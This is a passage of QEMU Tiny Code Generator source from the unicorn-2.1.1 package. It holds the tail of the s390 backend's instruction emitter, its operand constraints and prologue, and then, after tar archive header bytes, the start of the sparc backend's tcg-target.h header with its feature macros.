a0, a1, TCG_REG_NONE, a2); } else if (a0 == a1) { tcg_out_insn(s, RR, AR, a0, a2); } else { tcg_out_insn(s, RX, LA, a0, a1, a2, 0); } break; case INDEX_op_sub_i32: a0 = args[0], a1 = args[1], a2 = (int32_t)args[2]; if (const_args[2]) { a2 = -a2; goto do_addi_32; } else if (a0 == a1) { tcg_out_insn(s, RR, SR, a0, a2); } else { tcg_out_insn(s, RRF, SRK, a0, a1, a2); } break; case INDEX_op_and_i32: a0 = args[0], a1 = args[1], a2 = (uint32_t)args[2]; if (const_args[2]) { tcg_out_mov(s, TCG_TYPE_I32, a0, a1); tgen_andi(s, TCG_TYPE_I32, a0, a2); } else if (a0 == a1) { tcg_out_insn(s, RR, NR, a0, a2); } else { tcg_out_insn(s, RRF, NRK, a0, a1, a2); } break; case INDEX_op_or_i32: a0 = args[0], a1 = args[1], a2 = (uint32_t)args[2]; if (const_args[2]) { tcg_out_mov(s, TCG_TYPE_I32, a0, a1); tgen_ori(s, TCG_TYPE_I32, a0, a2); } else if (a0 == a1) { tcg_out_insn(s, RR, OR, a0, a2); } else { tcg_out_insn(s, RRF, ORK, a0, a1, a2); } break; case INDEX_op_xor_i32: a0 = args[0], a1 = args[1], a2 = (uint32_t)args[2]; if (const_args[2]) { tcg_out_mov(s, TCG_TYPE_I32, a0, a1); tgen_xori(s, TCG_TYPE_I32, a0, a2); } else if (a0 == a1) { tcg_out_insn(s, RR, XR, args[0], args[2]); } else { tcg_out_insn(s, RRF, XRK, a0, a1, a2); } break; case INDEX_op_neg_i32: tcg_out_insn(s, RR, LCR, args[0], args[1]); break; case INDEX_op_mul_i32: if (const_args[2]) { if ((int32_t)args[2] == (int16_t)args[2]) { tcg_out_insn(s, RI, MHI, args[0], args[2]); } else { tcg_out_insn(s, RIL, MSFI, args[0], args[2]); } } else { tcg_out_insn(s, RRE, MSR, args[0], args[2]); } break; case INDEX_op_div2_i32: tcg_out_insn(s, RR, DR, TCG_REG_R2, args[4]); break; case INDEX_op_divu2_i32: tcg_out_insn(s, RRE, DLR, TCG_REG_R2, args[4]); break; case INDEX_op_shl_i32: op = RS_SLL; op2 = RSY_SLLK; do_shift32: a0 = args[0], a1 = args[1], a2 = (int32_t)args[2]; if (a0 == a1) { if (const_args[2]) { tcg_out_sh32(s, op, a0, TCG_REG_NONE, a2); } else { tcg_out_sh32(s, op, a0, a2, 0); } } else { /* Using tcg_out_sh64 here for the format; it is a 32-bit shift. */ if (const_args[2]) { tcg_out_sh64(s, op2, a0, a1, TCG_REG_NONE, a2); } else { tcg_out_sh64(s, op2, a0, a1, a2, 0); } } break; case INDEX_op_shr_i32: op = RS_SRL; op2 = RSY_SRLK; goto do_shift32; case INDEX_op_sar_i32: op = RS_SRA; op2 = RSY_SRAK; goto do_shift32; case INDEX_op_rotl_i32: /* ??? Using tcg_out_sh64 here for the format; it is a 32-bit rol. */ if (const_args[2]) { tcg_out_sh64(s, RSY_RLL, args[0], args[1], TCG_REG_NONE, args[2]); } else { tcg_out_sh64(s, RSY_RLL, args[0], args[1], args[2], 0); } break; case INDEX_op_rotr_i32: if (const_args[2]) { tcg_out_sh64(s, RSY_RLL, args[0], args[1], TCG_REG_NONE, (32 - args[2]) & 31); } else { tcg_out_insn(s, RR, LCR, TCG_TMP0, args[2]); tcg_out_sh64(s, RSY_RLL, args[0], args[1], TCG_TMP0, 0); } break; case INDEX_op_ext8s_i32: tgen_ext8s(s, TCG_TYPE_I32, args[0], args[1]); break; case INDEX_op_ext16s_i32: tgen_ext16s(s, TCG_TYPE_I32, args[0], args[1]); break; case INDEX_op_ext8u_i32: tgen_ext8u(s, TCG_TYPE_I32, args[0], args[1]); break; case INDEX_op_ext16u_i32: tgen_ext16u(s, TCG_TYPE_I32, args[0], args[1]); break; OP_32_64(bswap16): /* The TCG bswap definition requires bits 0-47 already be zero. Thus we don't need the G-type insns to implement bswap16_i64. */ tcg_out_insn(s, RRE, LRVR, args[0], args[1]); tcg_out_sh32(s, RS_SRL, args[0], TCG_REG_NONE, 16); break; OP_32_64(bswap32): tcg_out_insn(s, RRE, LRVR, args[0], args[1]); break; case INDEX_op_add2_i32: if (const_args[4]) { tcg_out_insn(s, RIL, ALFI, args[0], args[4]); } else { tcg_out_insn(s, RR, ALR, args[0], args[4]); } tcg_out_insn(s, RRE, ALCR, args[1], args[5]); break; case INDEX_op_sub2_i32: if (const_args[4]) { tcg_out_insn(s, RIL, SLFI, args[0], args[4]); } else { tcg_out_insn(s, RR, SLR, args[0], args[4]); } tcg_out_insn(s, RRE, SLBR, args[1], args[5]); break; case INDEX_op_br: tgen_branch(s, S390_CC_ALWAYS, arg_label(args[0])); break; case INDEX_op_brcond_i32: tgen_brcond(s, TCG_TYPE_I32, args[2], args[0], args[1], const_args[1], arg_label(args[3])); break; case INDEX_op_setcond_i32: tgen_setcond(s, TCG_TYPE_I32, args[3], args[0], args[1], args[2], const_args[2]); break; case INDEX_op_movcond_i32: tgen_movcond(s, TCG_TYPE_I32, args[5], args[0], args[1], args[2], const_args[2], args[3], const_args[3]); break; case INDEX_op_qemu_ld_i32: /* ??? Technically we can use a non-extending instruction. */ case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, args[0], args[1], args[2]); break; case INDEX_op_qemu_st_i32: case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, args[0], args[1], args[2]); break; case INDEX_op_ld16s_i64: tcg_out_mem(s, 0, RXY_LGH, args[0], args[1], TCG_REG_NONE, args[2]); break; case INDEX_op_ld32u_i64: tcg_out_mem(s, 0, RXY_LLGF, args[0], args[1], TCG_REG_NONE, args[2]); break; case INDEX_op_ld32s_i64: tcg_out_mem(s, 0, RXY_LGF, args[0], args[1], TCG_REG_NONE, args[2]); break; case INDEX_op_ld_i64: tcg_out_ld(s, TCG_TYPE_I64, args[0], args[1], args[2]); break; case INDEX_op_st32_i64: tcg_out_st(s, TCG_TYPE_I32, args[0], args[1], args[2]); break; case INDEX_op_st_i64: tcg_out_st(s, TCG_TYPE_I64, args[0], args[1], args[2]); break; case INDEX_op_add_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { do_addi_64: if (a0 == a1) { if (a2 == (int16_t)a2) { tcg_out_insn(s, RI, AGHI, a0, a2); break; } if (s390_facilities & FACILITY_EXT_IMM) { if (a2 == (int32_t)a2) { tcg_out_insn(s, RIL, AGFI, a0, a2); break; } else if (a2 == (uint32_t)a2) { tcg_out_insn(s, RIL, ALGFI, a0, a2); break; } else if (-a2 == (uint32_t)-a2) { tcg_out_insn(s, RIL, SLGFI, a0, -a2); break; } } } tcg_out_mem(s, RX_LA, RXY_LAY, a0, a1, TCG_REG_NONE, a2); } else if (a0 == a1) { tcg_out_insn(s, RRE, AGR, a0, a2); } else { tcg_out_insn(s, RX, LA, a0, a1, a2, 0); } break; case INDEX_op_sub_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { a2 = -a2; goto do_addi_64; } else if (a0 == a1) { tcg_out_insn(s, RRE, SGR, a0, a2); } else { tcg_out_insn(s, RRF, SGRK, a0, a1, a2); } break; case INDEX_op_and_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_mov(s, TCG_TYPE_I64, a0, a1); tgen_andi(s, TCG_TYPE_I64, args[0], args[2]); } else if (a0 == a1) { tcg_out_insn(s, RRE, NGR, args[0], args[2]); } else { tcg_out_insn(s, RRF, NGRK, a0, a1, a2); } break; case INDEX_op_or_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_mov(s, TCG_TYPE_I64, a0, a1); tgen_ori(s, TCG_TYPE_I64, a0, a2); } else if (a0 == a1) { tcg_out_insn(s, RRE, OGR, a0, a2); } else { tcg_out_insn(s, RRF, OGRK, a0, a1, a2); } break; case INDEX_op_xor_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_mov(s, TCG_TYPE_I64, a0, a1); tgen_xori(s, TCG_TYPE_I64, a0, a2); } else if (a0 == a1) { tcg_out_insn(s, RRE, XGR, a0, a2); } else { tcg_out_insn(s, RRF, XGRK, a0, a1, a2); } break; case INDEX_op_neg_i64: tcg_out_insn(s, RRE, LCGR, args[0], args[1]); break; case INDEX_op_bswap64_i64: tcg_out_insn(s, RRE, LRVGR, args[0], args[1]); break; case INDEX_op_mul_i64: if (const_args[2]) { if (args[2] == (int16_t)args[2]) { tcg_out_insn(s, RI, MGHI, args[0], args[2]); } else { tcg_out_insn(s, RIL, MSGFI, args[0], args[2]); } } else { tcg_out_insn(s, RRE, MSGR, args[0], args[2]); } break; case INDEX_op_div2_i64: /* ??? We get an unnecessary sign-extension of the dividend into R3 with this definition, but as we do in fact always produce both quotient and remainder using INDEX_op_div_i64 instead requires jumping through even more hoops. */ tcg_out_insn(s, RRE, DSGR, TCG_REG_R2, args[4]); break; case INDEX_op_divu2_i64: tcg_out_insn(s, RRE, DLGR, TCG_REG_R2, args[4]); break; case INDEX_op_mulu2_i64: tcg_out_insn(s, RRE, MLGR, TCG_REG_R2, args[3]); break; case INDEX_op_shl_i64: op = RSY_SLLG; do_shift64: if (const_args[2]) { tcg_out_sh64(s, op, args[0], args[1], TCG_REG_NONE, args[2]); } else { tcg_out_sh64(s, op, args[0], args[1], args[2], 0); } break; case INDEX_op_shr_i64: op = RSY_SRLG; goto do_shift64; case INDEX_op_sar_i64: op = RSY_SRAG; goto do_shift64; case INDEX_op_rotl_i64: if (const_args[2]) { tcg_out_sh64(s, RSY_RLLG, args[0], args[1], TCG_REG_NONE, args[2]); } else { tcg_out_sh64(s, RSY_RLLG, args[0], args[1], args[2], 0); } break; case INDEX_op_rotr_i64: if (const_args[2]) { tcg_out_sh64(s, RSY_RLLG, args[0], args[1], TCG_REG_NONE, (64 - args[2]) & 63); } else { /* We can use the smaller 32-bit negate because only the low 6 bits are examined for the rotate. */ tcg_out_insn(s, RR, LCR, TCG_TMP0, args[2]); tcg_out_sh64(s, RSY_RLLG, args[0], args[1], TCG_TMP0, 0); } break; case INDEX_op_ext8s_i64: tgen_ext8s(s, TCG_TYPE_I64, args[0], args[1]); break; case INDEX_op_ext16s_i64: tgen_ext16s(s, TCG_TYPE_I64, args[0], args[1]); break; case INDEX_op_ext_i32_i64: case INDEX_op_ext32s_i64: tgen_ext32s(s, args[0], args[1]); break; case INDEX_op_ext8u_i64: tgen_ext8u(s, TCG_TYPE_I64, args[0], args[1]); break; case INDEX_op_ext16u_i64: tgen_ext16u(s, TCG_TYPE_I64, args[0], args[1]); break; case INDEX_op_extu_i32_i64: case INDEX_op_ext32u_i64: tgen_ext32u(s, args[0], args[1]); break; case INDEX_op_add2_i64: if (const_args[4]) { if ((int64_t)args[4] >= 0) { tcg_out_insn(s, RIL, ALGFI, args[0], args[4]); } else { tcg_out_insn(s, RIL, SLGFI, args[0], -args[4]); } } else { tcg_out_insn(s, RRE, ALGR, args[0], args[4]); } tcg_out_insn(s, RRE, ALCGR, args[1], args[5]); break; case INDEX_op_sub2_i64: if (const_args[4]) { if ((int64_t)args[4] >= 0) { tcg_out_insn(s, RIL, SLGFI, args[0], args[4]); } else { tcg_out_insn(s, RIL, ALGFI, args[0], -args[4]); } } else { tcg_out_insn(s, RRE, SLGR, args[0], args[4]); } tcg_out_insn(s, RRE, SLBGR, args[1], args[5]); break; case INDEX_op_brcond_i64: tgen_brcond(s, TCG_TYPE_I64, args[2], args[0], args[1], const_args[1], arg_label(args[3])); break; case INDEX_op_setcond_i64: tgen_setcond(s, TCG_TYPE_I64, args[3], args[0], args[1], args[2], const_args[2]); break; case INDEX_op_movcond_i64: tgen_movcond(s, TCG_TYPE_I64, args[5], args[0], args[1], args[2], const_args[2], args[3], const_args[3]); break; OP_32_64(deposit): a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[1]) { tgen_deposit(s, a0, a2, args[3], args[4], 1); } else { /* Since we can't support "0Z" as a constraint, we allow a1 in any register. Fix things up as if a matching constraint. */ if (a0 != a1) { TCGType type = (opc == INDEX_op_deposit_i64); if (a0 == a2) { tcg_out_mov(s, type, TCG_TMP0, a2); a2 = TCG_TMP0; } tcg_out_mov(s, type, a0, a1); } tgen_deposit(s, a0, a2, args[3], args[4], 0); } break; OP_32_64(extract): tgen_extract(s, args[0], args[1], args[2], args[3]); break; case INDEX_op_clz_i64: tgen_clz(s, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_mb: /* The host memory model is quite strong, we simply need to serialize the instruction stream. */ if (args[0] & TCG_MO_ST_LD) { tcg_out_insn(s, RR, BCR, s390_facilities & FACILITY_FAST_BCR_SER ? 14 : 15, 0); } break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. */ default: tcg_abort(); } } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef r_L = { .args_ct_str = { "r", "L" } }; static const TCGTargetOpDef L_L = { .args_ct_str = { "L", "L" } }; static const TCGTargetOpDef r_ri = { .args_ct_str = { "r", "ri" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_0_ri = { .args_ct_str = { "r", "0", "ri" } }; static const TCGTargetOpDef r_0_rI = { .args_ct_str = { "r", "0", "rI" } }; static const TCGTargetOpDef r_0_rJ = { .args_ct_str = { "r", "0", "rJ" } }; static const TCGTargetOpDef a2_r = { .args_ct_str = { "r", "r", "0", "1", "r", "r" } }; static const TCGTargetOpDef a2_ri = { .args_ct_str = { "r", "r", "0", "1", "ri", "r" } }; static const TCGTargetOpDef a2_rA = { .args_ct_str = { "r", "r", "0", "1", "rA", "r" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i32: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i32: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i32: case INDEX_op_ld16s_i64: case INDEX_op_ld_i32: case INDEX_op_ld32u_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld_i64: case INDEX_op_st8_i32: case INDEX_op_st8_i64: case INDEX_op_st16_i32: case INDEX_op_st16_i64: case INDEX_op_st_i32: case INDEX_op_st32_i64: case INDEX_op_st_i64: return &r_r; case INDEX_op_add_i32: case INDEX_op_add_i64: return &r_r_ri; case INDEX_op_sub_i32: case INDEX_op_sub_i64: case INDEX_op_and_i32: case INDEX_op_and_i64: case INDEX_op_or_i32: case INDEX_op_or_i64: case INDEX_op_xor_i32: case INDEX_op_xor_i64: return (s390_facilities & FACILITY_DISTINCT_OPS ? &r_r_ri : &r_0_ri); case INDEX_op_mul_i32: /* If we have the general-instruction-extensions, then we have MULTIPLY SINGLE IMMEDIATE with a signed 32-bit, otherwise we have only MULTIPLY HALFWORD IMMEDIATE, with a signed 16-bit. */ return (s390_facilities & FACILITY_GEN_INST_EXT ? &r_0_ri : &r_0_rI); case INDEX_op_mul_i64: return (s390_facilities & FACILITY_GEN_INST_EXT ? &r_0_rJ : &r_0_rI); case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: return (s390_facilities & FACILITY_DISTINCT_OPS ? &r_r_ri : &r_0_ri); case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: return &r_r_ri; case INDEX_op_rotl_i32: case INDEX_op_rotl_i64: case INDEX_op_rotr_i32: case INDEX_op_rotr_i64: return &r_r_ri; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: return &r_ri; case INDEX_op_bswap16_i32: case INDEX_op_bswap16_i64: case INDEX_op_bswap32_i32: case INDEX_op_bswap32_i64: case INDEX_op_bswap64_i64: case INDEX_op_neg_i32: case INDEX_op_neg_i64: case INDEX_op_ext8s_i32: case INDEX_op_ext8s_i64: case INDEX_op_ext8u_i32: case INDEX_op_ext8u_i64: case INDEX_op_ext16s_i32: case INDEX_op_ext16s_i64: case INDEX_op_ext16u_i32: case INDEX_op_ext16u_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext32u_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: case INDEX_op_extract_i32: case INDEX_op_extract_i64: return &r_r; case INDEX_op_clz_i64: case INDEX_op_setcond_i32: case INDEX_op_setcond_i64: return &r_r_ri; case INDEX_op_qemu_ld_i32: case INDEX_op_qemu_ld_i64: return &r_L; case INDEX_op_qemu_st_i64: case INDEX_op_qemu_st_i32: return &L_L; case INDEX_op_deposit_i32: case INDEX_op_deposit_i64: { static const TCGTargetOpDef dep = { .args_ct_str = { "r", "rZ", "r" } }; return &dep; } case INDEX_op_movcond_i32: case INDEX_op_movcond_i64: { static const TCGTargetOpDef movc = { .args_ct_str = { "r", "r", "ri", "r", "0" } }; static const TCGTargetOpDef movc_l = { .args_ct_str = { "r", "r", "ri", "rI", "0" } }; return (s390_facilities & FACILITY_LOAD_ON_COND2 ? &movc_l : &movc); } case INDEX_op_div2_i32: case INDEX_op_div2_i64: case INDEX_op_divu2_i32: case INDEX_op_divu2_i64: { static const TCGTargetOpDef div2 = { .args_ct_str = { "b", "a", "0", "1", "r" } }; return &div2; } case INDEX_op_mulu2_i64: { static const TCGTargetOpDef mul2 = { .args_ct_str = { "b", "a", "0", "r" } }; return &mul2; } case INDEX_op_add2_i32: case INDEX_op_sub2_i32: return (s390_facilities & FACILITY_EXT_IMM ? &a2_ri : &a2_r); case INDEX_op_add2_i64: case INDEX_op_sub2_i64: return (s390_facilities & FACILITY_EXT_IMM ? &a2_rA : &a2_r); default: break; } return NULL; } static void query_s390_facilities(void) { unsigned long hwcap = qemu_getauxval(AT_HWCAP); /* Is STORE FACILITY LIST EXTENDED available? Honestly, I believe this is present on all 64-bit systems, but let's check for it anyway. */ if (hwcap & HWCAP_S390_STFLE) { register int r0 __asm__("0"); register void *r1 __asm__("1"); /* stfle 0(%r1) */ r1 = &s390_facilities; asm volatile(".word 0xb2b0,0x1000" : "=r"(r0) : "0"(0), "r"(r1) : "memory", "cc"); } } static void tcg_target_init(TCGContext *s) { query_s390_facilities(); s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffff; s->tcg_target_available_regs[TCG_TYPE_I64] = 0xffff; s->tcg_target_call_clobber_regs = 0; tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R4); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R5); /* The r6 register is technically call-saved, but it's also a parameter register, so it can get killed by setup for the qemu_st helper. */ tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R6); /* The return register can be considered call-clobbered. */ tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R14); s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_TMP0); /* XXX many insns can't be used with R0, so we better avoid it for now */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_R0); tcg_regset_set_reg(s->reserved_regs, TCG_REG_CALL_STACK); if (USE_REG_TB) { tcg_regset_set_reg(s->reserved_regs, TCG_REG_TB); } } #define FRAME_SIZE ((int)(TCG_TARGET_CALL_STACK_OFFSET \ + TCG_STATIC_CALL_ARGS_SIZE \ + CPU_TEMP_BUF_NLONGS * sizeof(long))) static void tcg_target_qemu_prologue(TCGContext *s) { /* stmg %r6,%r15,48(%r15) (save registers) */ tcg_out_insn(s, RXY, STMG, TCG_REG_R6, TCG_REG_R15, TCG_REG_R15, 48); /* aghi %r15,-frame_size */ tcg_out_insn(s, RI, AGHI, TCG_REG_R15, -FRAME_SIZE); tcg_set_frame(s, TCG_REG_CALL_STACK, TCG_STATIC_CALL_ARGS_SIZE + TCG_TARGET_CALL_STACK_OFFSET, CPU_TEMP_BUF_NLONGS * sizeof(long)); #ifndef CONFIG_SOFTMMU if (guest_base >= 0x80000) { tcg_out_movi_int(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, guest_base, true); tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); } #endif tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); if (USE_REG_TB) { tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_TB, tcg_target_call_iarg_regs[1]); } /* br %r3 (go to TB) */ tcg_out_insn(s, RR, BCR, S390_CC_ALWAYS, tcg_target_call_iarg_regs[1]); /* * Return path for goto_ptr. Set return value to 0, a-la exit_tb, * and fall through to the rest of the epilogue. */ s->code_gen_epilogue = s->code_ptr; tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R2, 0); /* TB epilogue */ tb_ret_addr = s->code_ptr; /* lmg %r6,%r15,fs+48(%r15) (restore registers) */ tcg_out_insn(s, RXY, LMG, TCG_REG_R6, TCG_REG_R15, TCG_REG_R15, FRAME_SIZE + 48); /* br %r14 (return) */ tcg_out_insn(s, RR, BCR, S390_CC_ALWAYS, TCG_REG_R14); } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { memset(p, 0x07, count * sizeof(tcg_insn_unit)); } typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[4]; uint8_t fde_reg_ofs[18]; } DebugFrame; /* We're expecting a 2 byte uleb128 encoded value. */ QEMU_BUILD_BUG_ON(FRAME_SIZE >= (1 << 14)); #define ELF_HOST_MACHINE EM_S390 static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = 8, /* sleb128 8 */ .h.cie.return_column = TCG_REG_R14, /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { 12, TCG_REG_CALL_STACK, /* DW_CFA_def_cfa %r15, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) }, .fde_reg_ofs = { 0x86, 6, /* DW_CFA_offset, %r6, 48 */ 0x87, 7, /* DW_CFA_offset, %r7, 56 */ 0x88, 8, /* DW_CFA_offset, %r8, 64 */ 0x89, 9, /* DW_CFA_offset, %r92, 72 */ 0x8a, 10, /* DW_CFA_offset, %r10, 80 */ 0x8b, 11, /* DW_CFA_offset, %r11, 88 */ 0x8c, 12, /* DW_CFA_offset, %r12, 96 */ 0x8d, 13, /* DW_CFA_offset, %r13, 104 */ 0x8e, 14, /* DW_CFA_offset, %r14, 112 */ } }; void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame)); } ���������������unicorn-2.1.1/qemu/tcg/sparc/�����������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016040�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/sparc/tcg-target.h�����������������������������������������������������������0000664�0000000�0000000�00000013351�14675241067�0020255�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef SPARC_TCG_TARGET_H #define SPARC_TCG_TARGET_H #define TCG_TARGET_REG_BITS 64 #define TCG_TARGET_INSN_UNIT_SIZE 4 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 32 #define TCG_TARGET_NB_REGS 32 typedef enum { TCG_REG_G0 = 0, TCG_REG_G1, TCG_REG_G2, TCG_REG_G3, TCG_REG_G4, TCG_REG_G5, TCG_REG_G6, TCG_REG_G7, TCG_REG_O0, TCG_REG_O1, TCG_REG_O2, TCG_REG_O3, TCG_REG_O4, TCG_REG_O5, TCG_REG_O6, TCG_REG_O7, TCG_REG_L0, TCG_REG_L1, TCG_REG_L2, TCG_REG_L3, TCG_REG_L4, TCG_REG_L5, TCG_REG_L6, TCG_REG_L7, TCG_REG_I0, TCG_REG_I1, TCG_REG_I2, TCG_REG_I3, TCG_REG_I4, TCG_REG_I5, TCG_REG_I6, TCG_REG_I7, } TCGReg; #define TCG_CT_CONST_S11 0x100 #define TCG_CT_CONST_S13 0x200 #define TCG_CT_CONST_ZERO 0x400 /* used for function call generation */ #define TCG_REG_CALL_STACK TCG_REG_O6 #ifdef __arch64__ #define TCG_TARGET_STACK_BIAS 2047 #define TCG_TARGET_STACK_ALIGN 16 #define TCG_TARGET_CALL_STACK_OFFSET (128 + 6*8 + TCG_TARGET_STACK_BIAS) #else #define TCG_TARGET_STACK_BIAS 0 #define TCG_TARGET_STACK_ALIGN 8 #define TCG_TARGET_CALL_STACK_OFFSET (64 + 4 + 6*4) #endif #ifdef __arch64__ #define TCG_TARGET_EXTEND_ARGS 1 #endif #if defined(__VIS__) && __VIS__ >= 0x300 #define use_vis3_instructions 1 #else extern bool use_vis3_instructions; #endif /* optional instructions */ #define TCG_TARGET_HAS_div_i32 1 #define TCG_TARGET_HAS_rem_i32 0 #define TCG_TARGET_HAS_rot_i32 0 #define TCG_TARGET_HAS_ext8s_i32 0 #define TCG_TARGET_HAS_ext16s_i32 0 #define TCG_TARGET_HAS_ext8u_i32 0 #define TCG_TARGET_HAS_ext16u_i32 0 #define TCG_TARGET_HAS_bswap16_i32 0 #define TCG_TARGET_HAS_bswap32_i32 0 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_andc_i32 1 #define TCG_TARGET_HAS_orc_i32 1 #define TCG_TARGET_HAS_eqv_i32 0 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_nor_i32 0 #define TCG_TARGET_HAS_clz_i32 0 #define TCG_TARGET_HAS_ctz_i32 0 #define TCG_TARGET_HAS_ctpop_i32 0 #define TCG_TARGET_HAS_deposit_i32 0 #define TCG_TARGET_HAS_extract_i32 0 #define TCG_TARGET_HAS_sextract_i32 0 #define TCG_TARGET_HAS_extract2_i32 0 #define TCG_TARGET_HAS_movcond_i32 1 #define TCG_TARGET_HAS_add2_i32 1 #define TCG_TARGET_HAS_sub2_i32 1 #define TCG_TARGET_HAS_mulu2_i32 1 #define TCG_TARGET_HAS_muls2_i32 1 #define TCG_TARGET_HAS_muluh_i32 0 #define TCG_TARGET_HAS_mulsh_i32 0 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_direct_jump 1 #define TCG_TARGET_HAS_extrl_i64_i32 1 #define TCG_TARGET_HAS_extrh_i64_i32 1 #define TCG_TARGET_HAS_div_i64 1 #define TCG_TARGET_HAS_rem_i64 0 #define TCG_TARGET_HAS_rot_i64 0 #define TCG_TARGET_HAS_ext8s_i64 0 #define TCG_TARGET_HAS_ext16s_i64 0 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext8u_i64 0 #define TCG_TARGET_HAS_ext16u_i64 0 #define TCG_TARGET_HAS_ext32u_i64 1 #define TCG_TARGET_HAS_bswap16_i64 0 #define TCG_TARGET_HAS_bswap32_i64 0 #define TCG_TARGET_HAS_bswap64_i64 0 #define TCG_TARGET_HAS_neg_i64 1 #define TCG_TARGET_HAS_not_i64 1 #define TCG_TARGET_HAS_andc_i64 1 #define TCG_TARGET_HAS_orc_i64 1 #define TCG_TARGET_HAS_eqv_i64 0 #define TCG_TARGET_HAS_nand_i64 0 #define TCG_TARGET_HAS_nor_i64 0 #define TCG_TARGET_HAS_clz_i64 0 #define TCG_TARGET_HAS_ctz_i64 0 #define TCG_TARGET_HAS_ctpop_i64 0 #define TCG_TARGET_HAS_deposit_i64 0 #define TCG_TARGET_HAS_extract_i64 0 #define TCG_TARGET_HAS_sextract_i64 0 #define TCG_TARGET_HAS_extract2_i64 0 #define TCG_TARGET_HAS_movcond_i64 1 #define TCG_TARGET_HAS_add2_i64 1 #define TCG_TARGET_HAS_sub2_i64 1 #define TCG_TARGET_HAS_mulu2_i64 0 #define TCG_TARGET_HAS_muls2_i64 0 #define TCG_TARGET_HAS_muluh_i64 use_vis3_instructions #define TCG_TARGET_HAS_mulsh_i64 0 